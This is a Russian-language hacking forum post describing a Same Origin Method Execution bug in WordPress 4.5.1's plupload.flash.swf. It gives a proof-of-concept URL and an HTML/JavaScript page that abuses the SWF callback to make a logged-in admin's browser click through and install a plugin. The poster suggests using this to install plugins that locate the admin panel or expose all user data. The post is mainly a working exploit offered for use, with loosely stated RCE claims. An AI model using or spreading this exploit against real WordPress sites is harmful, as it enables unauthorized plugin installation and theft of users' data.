РЕКЛАМА НА ФОРУМЕ 

РЕКЛАМА НА ФОРУМЕ MultiVPN РЕКЛАМА НА ФОРУМЕ

WP SOME баг

Сообщения
191
Реакции
233
Баллы
58
SOME (Тот же оригинальный метод выполнение) баг был открыт юзерами Heiderich, Filedescriptor, Kinugawa
с помощью этого бага вы сможете выполнить RCE или XSS команды
Баг находится в Wordpress 4.5.1 файле flash.swf
с помощью ниже указанного POC вы сможете добавить в систему любой плагин
http://example.com//wp-includes/js/plupload/plupload.flash.swf?target%g=alert&uid%g=hello&
Как можно использовать этот баг
Для примера возьмем код
Код:
<button onclick="fire()">Click</button>
<script>
function fire() {
open(’javascript:setTimeout("location=\\’http://example.com/wp-includes/js/plupload/plupload.flash.swf?target%g=opener.document.bOdy.firstElementChild.nextElementSibling.nextElementSibling.nextElementSibling.firstElementChild.click&uid%g=hello&\\’", 2000)’);
setTimeout(’location="http://example.com/wp-admin/plugin-install.php?tab=plugin-information&plugin=wp-super-cache&TB_iframe=true&width=600&height=550"’)
}
</script>
Можно установить плагин который находит админку или же показывает все данные юзеров
 
  • Like
Реакции: ResH
Сверху